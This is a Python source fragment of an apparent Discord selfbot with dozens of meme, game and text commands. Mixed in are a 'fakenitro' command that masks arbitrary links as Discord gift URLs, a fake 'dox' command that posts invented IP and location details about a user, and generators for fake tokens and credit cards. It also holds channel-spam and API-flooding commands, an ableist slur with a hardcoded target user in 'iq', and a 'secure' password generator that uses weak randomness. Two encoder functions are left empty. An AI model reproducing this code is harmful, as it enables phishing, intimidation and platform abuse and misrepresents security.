embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send("This command requires an alexflipnote API key.")
else:
imageurl = avatarUrl(user.id, user.avatar)
image = requests.get(f"https://api.alexflipnote.dev/salty?image={imageurl}", headers={"Authorization": CONFIG["api_keys"]["alexflipnote"]})
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@BetterGhost.command(name="ship", description="Ship two people.", usage="ship [@user 1] [@user 2]")
async def ship(ctx, user1:discord.User, user2:discord.User):
if CONFIG["api_keys"]["alexflipnote"] == "":
if __embedmode__:
embed = discord.Embed(description="This command requires an alexflipnote API key.", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send("This command requires an alexflipnote API key.")
else:
user1 = avatarUrl(user1.id, user1.avatar)
user2 = avatarUrl(user2.id, user2.avatar)
image = requests.get(f"https://api.alexflipnote.dev/ship?user={user1}&user2={user2}", headers={"Authorization": CONFIG["api_keys"]["alexflipnote"]})
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@BetterGhost.command(name="supreme", description="Create a supreme logo image.", usage='supreme [text]')
async def supreme(ctx, *, text):
if CONFIG["api_keys"]["alexflipnote"] == "":
if __embedmode__:
embed = discord.Embed(description="This command requires an alexflipnote API key.", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send("This command requires an alexflipnote API key.")
else:
text = text.replace(" ", "+")
image = requests.get(f"https://api.alexflipnote.dev/supreme?text={text}", headers={"Authorization": CONFIG["api_keys"]["alexflipnote"]})
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@BetterGhost.command(name="trash", description="Put someone in the trash.", usage='trash [@user]')
async def trash(ctx, user: discord.User):
if CONFIG["api_keys"]["alexflipnote"] == "":
if __embedmode__:
embed = discord.Embed(description="This command requires an alexflipnote API key.", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send("This command requires an alexflipnote API key.")
else:
trash = avatarUrl(user.id, user.avatar)
face = avatarUrl(BetterGhost.user.id, BetterGhost.user.avatar)
image = requests.get(f"https://api.alexflipnote.dev/trash?trash={trash}&face={face}", headers={"Authorization": CONFIG["api_keys"]["alexflipnote"]})
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@BetterGhost.command(name="what", description="Make a what meme.", usage='what [image url]')
async def what(ctx, *, imageurl):
if CONFIG["api_keys"]["alexflipnote"] == "":
if __embedmode__:
embed = discord.Embed(description="This command requires an alexflipnote API key.", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send("This command requires an alexflipnote API key.")
else:
image = requests.get(f"https://api.alexflipnote.dev/what?image={imageurl}", headers={"Authorization": CONFIG["api_keys"]["alexflipnote"]})
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@BetterGhost.command(name="purgehack", description="Purge without permissions.", usage="purgehack")
async def purgehack(ctx):
await ctx.send(f"** **\n"*100)
@BetterGhost.command(name="iq", description="Check how smart a user is.", usage="iq [@user]")
async def iq(ctx, user: discord.User):
iq = random.randint(45, 135)
smart = ""
if user.id == 858034873415368715:
iq = 45
if iq > 90 and iq < 135:
smart = "They're very smart!"
if iq > 70 and iq < 90:
smart = "They're just below average."
if iq > 50 and iq < 70:
smart = "They might have some issues."
if iq > 40 and iq < 50:
smart = "They're severely retarded."
if __embedmode__:
embed = discord.Embed(title=f"{user.name}'s iq is `{iq}`.", description=f"{smart}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"{user}'s iq is `{iq}`. {smart}")
@BetterGhost.command(name="howskid", description="Check the percentage of a skid.", usage="howskid [item]")
async def howskidd(ctx, *, item):
percentage = random.randint(0, 100)
if __embedmode__:
embed = discord.Embed(title="Skid Detection", description=f"{item} is {percentage}% skidded!", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"`{item}` is {percentage}% skidded!")
@BetterGhost.command(name="howgay", description="How gay a user is.", usage="howgay [@user]")
async def howgay(ctx, user: discord.User):
percentage = str(random.randint(15, 100)) + "%"
if __embedmode__:
embed = discord.Embed(title=f"🏳️🌈 {user.name} is {percentage} gay", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"🏳️🌈 {user} is {percentage} gay")
@BetterGhost.command(name="slots", description="Play the slot machine.", usage="slots")
async def slots(ctx):
if __embedmode__:
embed = discord.Embed(title=f"Slots", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
message = await ctx.send(embed=embed)
else:
message = await ctx.send(f"""```ini
[ Slots ]
# {__embedfooter__}
```""")
emojis = [("🍒", 0.01), ("🍊", 0.02), ("🍎", 0.06), ("💎", 0.08), ("🍆", 0.14), ("🍉", 0.24), ("🎰", 0.36)]
emojis2 = []
for emoji, probability in emojis:
emojis2 += emoji*int(probability*100)
async def game():
amount = 8
delay = 0.5
dots = "."
reel_1 = ""
reel_2 = ""
reel_3 = ""
final_reel = ""
for _ in range(amount):
delay += 0.02
dots += "."
if dots == "....":
dots = "."
reel_1 = random.choice(emojis2)
reel_2 = random.choice(emojis2)
reel_3 = random.choice(emojis2)
final_reel = reel_1 + " | " + reel_2 + " | " + reel_3
if __embedmode__:
embed = discord.Embed(title=f"Spinning{dots}", description=final_reel, color=__embedcolour__)
embed.timestamp = datetime.now()
await message.edit(content="", embed=embed)
else:
await message.edit(content=f"""```ini
[ Spinning{dots} ]
{final_reel}
# {__embedfooter__}
```""")
await asyncio.sleep(delay)
if reel_1 == reel_2 and reel_1 == reel_3 and reel_2 == reel_3:
if __embedmode__:
embed = discord.Embed(title=f"You won!", description=final_reel, color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await message.edit(content="", embed=embed)
else:
await message.edit(content=f"""```ini
[ You won! ]
{final_reel}
# {__embedfooter__}
```""")
else:
if __embedmode__:
embed = discord.Embed(title=f"You lost ;(", description=final_reel, color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await message.edit(content="", embed=embed)
else:
await message.edit(content=f"""```ini
[ You lost ;( ]
{final_reel}
# {__embedfooter__}
```""")
await game()
@BetterGhost.command(name="socialcredit", description="A users social credit score.", usage="socialcredit [@user]")
async def socialcredit(ctx, user: discord.User):
credit = random.randint(-5000000, 10000000)
if __embedmode__:
embed = discord.Embed(description=f"{user.name}'s social credit score is {credit}", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"{user.name}'s social credit score is {credit}")
@BetterGhost.command(name="roast", description="Roast a user.", usage="roast [@user]", aliases=["insult"])
async def roast(ctx, user: discord.User):
insult = requests.get("https://evilinsult.com/generate_insult.php?lang=en&type=json").json()["insult"]
if __embedmode__:
embed = discord.Embed(description=insult, colour=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(user.mention, embed=embed)
else:
await ctx.send(f"Ayo {user.mention}, " + str(insult).lower())
@BetterGhost.command(name="yomomma", description="Random yo momma joke.", usage="yomomma", aliases=["mom", "mum"])
async def yomomma(ctx):
joke = requests.get("https://api.yomomma.info/").json()["joke"]
if __embedmode__:
embed = discord.Embed(description=joke, colour=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(joke)
@BetterGhost.command(name="fakeedited", description='"Edit" a message.', usage="fakeedited [message]", aliases=["edited"])
async def fakeedited(ctx, *, message):
msg = await ctx.send(message)
await msg.edit(content=message + " hehe")
await msg.edit(content=message)
@BetterGhost.command(name="pp", description="The length of a user's penis.", usage="pp (@user)", aliases=["dicksize", "cocksize", "penissize"])
async def pp(ctx, user: discord.User = None):
size = "8" + "="*random.randint(1, 12) + "D"
if user is None:
if __embedmode__:
embed = discord.Embed(title=f"{BetterGhost.user.name}'s pp is {size}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"{BetterGhost.user.name}'s pp size\n{size}")
else:
if __embedmode__:
embed = discord.Embed(title=f"{user.name}'s pp is {size}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"{user.name}'s pp size\n{size}")
# @BetterGhost.command(name="trumptweet", description="Make Donald Trump tweet anything.", usage="trumptweet [tweet]")
# async def trumptweet(ctx, *, tweet):
# img = Image.open("trump-tweets/assets/bg.png")
# draw = ImageDraw.Draw(img)
# font = ImageFont.truetype('trump-tweets/assets/roboto.ttf', 30)
# draw.text((39, 123),f"{tweet}",(0,0,0),font=font)
# randomnum = random.randint(1000, 9999)
# img.save(f'trump-tweets/{randomnum}.png')
# file = discord.File(f'trump-tweets/{randomnum}.png')
# try:
# embed = discord.Embed(title='Trump Tweeted...', color=__embedcolour__)
# embed.set_image(url=f'attachment://{randomnum}.png')
# embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
# embed.timestamp = datetime.now()
# await ctx.send(file=file, embed=embed)
# except discord.HTTPException:
# await ctx.send(file=file)
@BetterGhost.command(name="rainbowrole", description="Kill Discord's API with a sexy rainbow role.", usage="rainbowrole [@role]")
async def rainbowrole(ctx, *, role: discord.Role):
oldcolour = role.color
red = Color("#ff3d3d")
pink = Color("#f54287")
rainbow = list(red.range_to(pink, 50))
if __embedmode__:
embed = discord.Embed(title=f"Rainbow Role", color=__embedcolour__, description=f"{role} now has a rainbow colour.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Rainbow Role ]
{role} now has a rainbow colour.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
for _ in range(5):
for x in rainbow:
colour = f'{x}'
await role.edit(color=int(colour.replace('#', '0x'), 0))
await role.edit(color=oldcolour)
@BetterGhost.command(name="rembed", description="Kill Discord's API with a sexy rainbow embedded message.", usage="rembed [text]", aliases=["rainbowembed"])
async def rembed(ctx, *, text):
if __embedmode__:
red = Color("#ff3d3d")
pink = Color("#f54287")
rainbow = list(red.range_to(pink, 25))
embed = discord.Embed(color=int("#ff3d3d".replace('#', '0x'), 0))
embed.set_author(name=text)
msg = await ctx.send(embed=embed)
for _ in range(5):
for x in rainbow:
colour = f'{x}'
newembed = discord.Embed(color=int(colour.replace('#', '0x'), 0))
newembed.set_author(name=text)
await msg.edit(embed=newembed)
await msg.edit(embed=discord.Embed(color=int("#f54287".replace("#", "0x"), 0)).set_author(name=text))
else:
await ctx.send("This command can only be used in embed mode.")
@BetterGhost.command(name="coinflip", description="Flip a coin.", usage="coinflip", aliases=["flipacoin"])
async def coinflip(ctx):
choices = ["Heads", "Tails"]
choice = random.choice(choices)
if __embedmode__:
embed = discord.Embed(title=f"{choice}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(choice)
@BetterGhost.command(name="dice", description="Roll a dice.", usage="dice", aliases=["rolladice"])
async def dice(ctx):
choice = random.randint(1,6)
if __embedmode__:
embed = discord.Embed(title=f"{choice}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(choice)
@BetterGhost.command(name="rps", description="Rock, paper, scissors.", usage="rps", aliases=["rockpaperscissors"])
async def rps(ctx, move = None):
if move is not None:
choices = ["Rock", "Paper", "Scissors"]
computer = random.choice(choices)
try:
try:
player = move
if player == computer:
e = discord.Embed(title=f'Tie!', description=f'We chose the same!', color=__embedcolour__)
elif player == 'Rock' and computer == 'Scissors':
e = discord.Embed(title=f'Player wins!', description=f'{player} smashes {computer}!', color=__embedcolour__)
elif player == 'Rock' and computer == 'Paper':
e = discord.Embed(title=f'Computer wins!', description=f'{computer} covers {player}!', color=__embedcolour__)
elif player == 'Paper' and computer == 'Rock':
e = discord.Embed(title=f'Player wins!', description=f'{player} covers {computer}!', color=__embedcolour__)
elif player == 'Paper' and computer == 'Scissors':
e = discord.Embed(title=f'Computer wins!', description=f'{computer} cuts {player}!', color=__embedcolour__)
elif player == 'Scissors' and computer == 'Paper':
e = discord.Embed(title=f'Player wins!', description=f'{player} cuts {computer}!', color=__embedcolour__)
elif player == "Scissors" and computer == 'Rock':
e = discord.Embed(title=f'Computer wins!', description=f'{computer} smashes {player}!', color=__embedcolour__)
else:
e = discord.Embed(title=f'Invalid play', description=f'Try either Rock, Paper or Scissors.', color=__embedcolour__)
e.set_thumbnail(url=__embedimage__)
e.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
e.timestamp = datetime.now()
await ctx.send(embed=e)
except IndexError:
e = discord.Embed(title=f'Invalid play', description=f'Try either Rock, Paper or Scissors.', color=__embedcolour__)
e.set_thumbnail(url=__embedimage__)
e.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
e.timestamp = datetime.now()
await ctx.send(embed=e)
except:
pass
else:
e = discord.Embed(title=f'Invalid play', description=f'Try either Rock, Paper or Scissors.', color=__embedcolour__)
e.set_thumbnail(url=__embedimage__)
e.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
e.timestamp = datetime.now()
await ctx.send(embed=e)
@BetterGhost.command(name="8ball", description="Ask the magic eight ball a question.", usage="8ball [question]", aliases=["eightball", "magic8ball"])
async def eightball(ctx, *, question):
choices = ["As I see it, yes.", "Ask again later.", "Better not tell you now.", "Cannot predict now.", "Concentrate and ask again.", "Don’t count on it.", "It is certain.", "It is decidedly so.", "Most likely.", "My reply is no.", "My sources say no.", "Outlook not so good.", "Outlook good.", "Reply hazy, try again.", "Signs point to yes.", "Very doubtful.", "Without a doubt.", "Yes.", "Yes – definitely.", "You may rely on it."]
choice = random.choice(choices)
choice = "8ball says, " + choice
if __embedmode__:
embed = discord.Embed(title=f"{question}", description=choice, color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(question + "\n" + choice)
@BetterGhost.command(name="choice", description="Pick a random choice.", usage="choice [choice1] [choice2]", aliases=["pick"])
async def choice(ctx, choice1, choice2):
choices = [choice1, choice2]
choice = random.choice(choices)
if __embedmode__:
embed = discord.Embed(title=f"{choice}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(choice)
# @BetterGhost.command(name="wyr", description="Would you rather questions.", usage="wyr")
# async def wyr_(ctx):
# question, _ = wyr()
# embed = discord.Embed(title="Would You Rather", description=question, color=__embedcolour__)
# embed.set_thumbnail(url=__embedimage__)
# embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
# embed.timestamp = datetime.now()
# await ctx.send(embed=embed)
# # await message.add_reaction("\U0001F7E6")
# # await message.add_reaction("\U0001F7E5")
@BetterGhost.command(name="dox", description="Dox the mentioned user.", usage="dox [@user]")
async def dox(ctx, *, user: discord.User):
randint1 = random.randint(100, 270)
randint2 = random.randint(100, 270)
randint3 = random.randint(10, 40)
randint4 = random.randint(100, 270)
countries = ["Afghanistan","Albania","Algeria","Andorra","Angola","Anguilla","Argentina","Armenia","Aruba","Australia","Austria","Azerbaijan","Bahamas","Bahrain","Bangladesh","Barbados","Belarus","Belgium","Belize","Benin","Bermuda","Bhutan","Bolivia","Bosnia & Herzegovina","Botswana","Brazil","British Virgin Islands","Brunei","Bulgaria","Burkina Faso","Burundi","Cambodia","Cameroon","Cape Verde","Cayman Islands","Chad","Chile","China","Colombia","Congo","Cook Islands","Costa Rica","Cote D Ivoire","Croatia","Cruise Ship","Cuba","Cyprus","Czech Republic","Denmark","Djibouti","Dominica","Dominican Republic","Ecuador","Egypt","El Salvador","Equatorial Guinea","Estonia","Ethiopia","Falkland Islands","Faroe Islands","Fiji","Finland","France","French Polynesia","French West Indies","Gabon","Gambia","Georgia","Germany","Ghana","Gibraltar","Greece","Greenland","Grenada","Guam","Guatemala","Guernsey","Guinea","Guinea Bissau","Guyana","Haiti","Honduras","Hong Kong","Hungary","Iceland","India","Indonesia","Iran","Iraq","Ireland","Isle of Man","Israel","Italy","Jamaica","Japan","Jersey","Jordan","Kazakhstan","Kenya","Kuwait","Kyrgyz Republic","Laos","Latvia","Lebanon","Lesotho","Liberia","Libya","Liechtenstein","Lithuania","Luxembourg","Macau","Macedonia","Madagascar","Malawi","Malaysia","Maldives","Mali","Malta","Mauritania","Mauritius","Mexico","Moldova","Monaco","Mongolia","Montenegro","Montserrat","Morocco","Mozambique","Namibia","Nepal","Netherlands","Netherlands Antilles","New Caledonia","New Zealand","Nicaragua","Niger","Nigeria","Norway","Oman","Pakistan","Palestine","Panama","Papua New Guinea","Paraguay","Peru","Philippines","Poland","Portugal","Puerto Rico","Qatar","Reunion","Romania","Russia","Rwanda","Saint Pierre & Miquelon","Samoa","San Marino","Saudi Arabia","Senegal","Serbia","Seychelles","Sierra Leone","Singapore","Slovakia","Slovenia","South Africa","South Korea","Spain","Sri Lanka","St Kitts & Nevis","St Lucia","St Vincent","St. Lucia","Sudan","Suriname","Swaziland","Sweden","Switzerland","Syria","Taiwan","Tajikistan","Tanzania","Thailand","Timor L'Este","Togo","Tonga","Trinidad & Tobago","Tunisia","Turkey","Turkmenistan","Turks & Caicos","Uganda","Ukraine","United Arab Emirates","United Kingdom","Uruguay","Uzbekistan","Venezuela","Vietnam","Virgin Islands (US)","Yemen","Zambia","Zimbabwe"]
computer = ['Windows', 'Mac', 'Linux', 'IOS', 'Android', 'Unknown']
if __embedmode__:
embed = discord.Embed(title=f"Doxxed {user.name}", color=__embedcolour__)
embed.add_field(name="IP Address", value=f"```{randint1}.{randint2}.{randint3}.{randint4}```")
embed.add_field(name="Country", value="```" + random.choice(countries) + "```")
embed.add_field(name="Computer", value="```" + random.choice(computer) + "```")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"Doxxed {user.name}\nIP Address: {randint1}.{randint2}.{randint3}.{randint4}\nCountry: " + random.choice(countries) + "\nComputer: " + random.choice(computer))
@BetterGhost.command(name="fakenitro", description="Hide a link in a nitro URL.", usage="fakenitro [url]")
async def fakenitro(ctx, *, url):
code = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(16))
nitro = "https://discord.gift/" + code
if __embedmode__:
embed = discord.Embed(title=f"Nitro", color=__embedcolour__, description=f"[{nitro}]({url})")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send("This command can only be used in embed mode.")
@BetterGhost.command(name="nitrogen", description="Generate a nitro code.", usage="nitrogen", aliases=["nitrogenerate", "generatenitro", "gennitro"])
async def nitrogen(ctx):
code = ''.join(random.choice(string.ascii_letters + string.digits ) for i in range(19))
nitro = "https://discord.gift/" + code
if __embedmode__:
embed = discord.Embed(title=f"Nitro", color=__embedcolour__, description=f"{nitro}")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(nitro)
@BetterGhost.command(name="tokengen", description="Generate a discord user token.", usage="tokengen", aliases=["generatetoken", "tokengenerate", "gentoken"])
async def tokengen(ctx):
authorId = str(ctx.author.id)
message_bytes = authorId.encode('ascii')
base64_bytes = base64.b64encode(message_bytes)
token1 = base64_bytes.decode('ascii')
token2 = ''.join(random.choice(string.ascii_letters + string.digits ) for i in range(6))
token3 = ''.join(random.choice(string.ascii_letters + string.digits ) for i in range(27))
token = f"{token1}.{token2}.{token3}"
if __embedmode__:
embed = discord.Embed(title=f"Token Generator", color=__embedcolour__, description=f"{token}")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(token)
@BetterGhost.command(name="identitygen", description="Generate a fake identity.", usage="identitygen", aliases=["identitygenerate", "generateidentity", "genidentity"])
async def identitygen(ctx):
firstname = fake.first_name()
lastname = fake.last_name()
address = fake.address()
job = fake.job()
phone = fake.phone_number()
emails = ["gmail.com", "yahoo.com", "yahoo.co.uk"]
emailchoice = random.choice(emails)
email = f"{firstname}.{lastname}@{emailchoice}"
birthdate = fake.date_of_birth()
genderchoices = ["Male", "Female"]
gender = random.choice(genderchoices)
if __embedmode__:
embed = discord.Embed(title=f"Identity Generator", color=__embedcolour__)
embed.add_field(name="Full Name", value=f"{firstname} {lastname}", inline=True)
embed.add_field(name="Email", value=f"{email}", inline=True)
embed.add_field(name="Phone Number", value=f"{phone}", inline=True)
embed.add_field(name="Occupation", value=f"{job}", inline=True)
embed.add_field(name="Birthdate", value=f"{birthdate}", inline=True)
embed.add_field(name="Gender", value=f"{gender}", inline=True)
embed.add_field(name="Address", value=f"{address}", inline=True)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ Identity Generator ]
Full Name: {firstname} {lastname}
Email: {email}
Phone Number: {phone}
Occupation: {job}
Birthdate: {birthdate}
Gender: {gender}
Address: {address}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="passwordgen", description="Generate a secure password.", usage="passwordgen [length]", aliases=["passwordgenerate", "generatepassword", "genpassword"])
async def passwordgen(ctx, length: int):
password = ''.join(random.choice(string.ascii_letters) for i in range(length))
if __embedmode__:
embed = discord.Embed(title="Password Generator", color=__embedcolour__, description=f"Your generated password is ||{password}||")
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"Password: ||{password}||")
@BetterGhost.command(name="ccgen", description="Generate a fake Credit card.", usage="ccgen", aliases=["creditcardgenerate", "creditcardgen", "generatecc", "ccgenerate", "gencreditcard", "generatecreditcard"])
async def ccgen(ctx):
name = names.get_full_name()
address = fake.address()
cvv = random.randint(100, 999)
expiremonth = random.randint(1, 12)
expireyear = now.year + random.randint(1, 4)
choices = [4,5,6]
choice = random.choice(choices)
if choice == 4:
type = "Visa"
typeimg = "https://ghost.cool/assets/visa.png"
elif choice == 5:
type = "Mastercard"
typeimg = "https://ghost.cool/assets/mastercard.png"
elif choice == 6:
type = "Discover"
typeimg = "https://ghost.cool/assets/discover.png"
string1 = random.randint(100, 999)
string2 = random.randint(1000, 9999)
string3 = random.randint(1000, 9999)
string4 = random.randint(1000, 9999)
if __embedmode__:
embed = discord.Embed(title="Credit Card Generator", color=__embedcolour__)
embed.add_field(name="Number", value=f"{choice}{string1} {string2} {string3} {string4}", inline=True)
embed.add_field(name="Name", value=f"{name}", inline=True)
embed.add_field(name="CVV", value=f"{cvv}", inline=True)
embed.add_field(name="Expire Date", value=f"{expiremonth}/{expireyear}", inline=True)
embed.add_field(name="Type", value=f"{type}", inline=True)
embed.add_field(name="Address", value=f"{address}", inline=True)
embed.set_thumbnail(url=typeimg)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ Credit Card Generator ]
Number: {choice}{string1} {string2} {string3} {string4}
Name: {name}
CVV: {cvv}
Expire Date: {expiremonth}/{expireyear}
Type: {type}
Address: {address}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@BetterGhost.command(name="cembed", description="Create a custom embedded message.", usage='cembed [title] [description] [colour]', aliases=["customembed"])
async def cembed(ctx, title, description, colour):
if __embedmode__:
colour = int(colour.replace('#', '0x'), 0)
embed = discord.Embed(title=title, description=description, color=colour)
await ctx.send(embed=embed)
else:
await ctx.send("This command can only be used in embed mode.")
@BetterGhost.command(name="embed", description="Create an embedded message.", usage="embed [title]")
async def embed(ctx, *, title):
if __embedmode__:
embed = discord.Embed(title=title, color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send("This command can only be used in embed mode.")
@BetterGhost.command(name="leet", description="Turn your text into 1337 text.", usage="leet [text]", aliases=["1337", "leetspeak"])
async def leet(ctx, *, text):
text = text.replace(" ", "+")
await ctx.send(requests.get(f"https://ghost.cool/api/fun/leet?text={text}").text)
@BetterGhost.command(name="zalgo", description="Unleash the zalgo into your message.", usage="zalgo [text]")
async def zalgo(ctx, *, text):
text = text.replace(" ", "+")
await ctx.send(requests.get(f"https://ghost.cool/api/fun/zalgo?text={text}").text)
@BetterGhost.command(name="upsidedown", description="Flip your text upsidedown.", usage="upsidedown [text]")
async def upsidedown(ctx, *, text):
text = text.replace(" ", "+")
await ctx.send(requests.get(f"https://ghost.cool/api/fun/upsidedown?text={text}").text)
@BetterGhost.command(name="reverse", description="Reverse your text making them look backwards.", usage="reverse [text]", aliases=["backwards"])
async def reverse(ctx, *, text):
await ctx.send(''.join(list(reversed(text))))
@BetterGhost.command(name="ascii", description="Send your message in ascii.", usage="ascii [text]")
async def ascii(ctx, *, text):
message = text
art = requests.get(f'http://artii.herokuapp.com/make?text={urllib.parse.quote_plus(message)}+&font=standard').text
await ctx.send(f"```{art}```")
@BetterGhost.command(name="privatemsg", description="Send an encrypted message.", usage="privatemsg [message]", aliases=["b64encode", "privatemessage"])
async def privatemsg(ctx, *, message):
message_bytes = message.encode('ascii')
base64_bytes = base64.b64encode(message_bytes)
base64_message = base64_bytes.decode('ascii')
await ctx.send(base64_message)
@BetterGhost.command(name="privatemsgdecode", description="Decode an encrypted message.", usage="privatemsgdecode [message]", aliases=["b64decode", "privatemessagedecode"])
async def privatemsgdecode(ctx, *, message):
base64_message = message
base64_bytes = base64_message.encode('ascii')
message_bytes = base64.b64decode(base64_bytes)
message = message_bytes.decode('ascii')
await ctx.send(message)
@BetterGhost.command(name="encodebinary", description="Encode a message in binary.", usage="encodebinary [message]", aliases=["binaryencode", "binary"])
async def encodebinary(ctx, *, message):
translation = ""
@BetterGhost.command(name="decodebinary", description="Decode a message in binary.", usage="decodebinary [message]", aliases=["binarydecode", "unbinary"])
async def decodebinary(ctx, *, message):
translation = ""
@BetterGhost.command(name="encodemorse", description="Encode a message in morsecode", usage="encodemorse [message]", aliases=["morseencode", "morse"])
async def encodemorse(ctx, *, message):
text = message.replace(" ", "+")
await ctx.send(requests.get(f"https://ghost.cool/api/fun/encodemorse?text={text}").text)
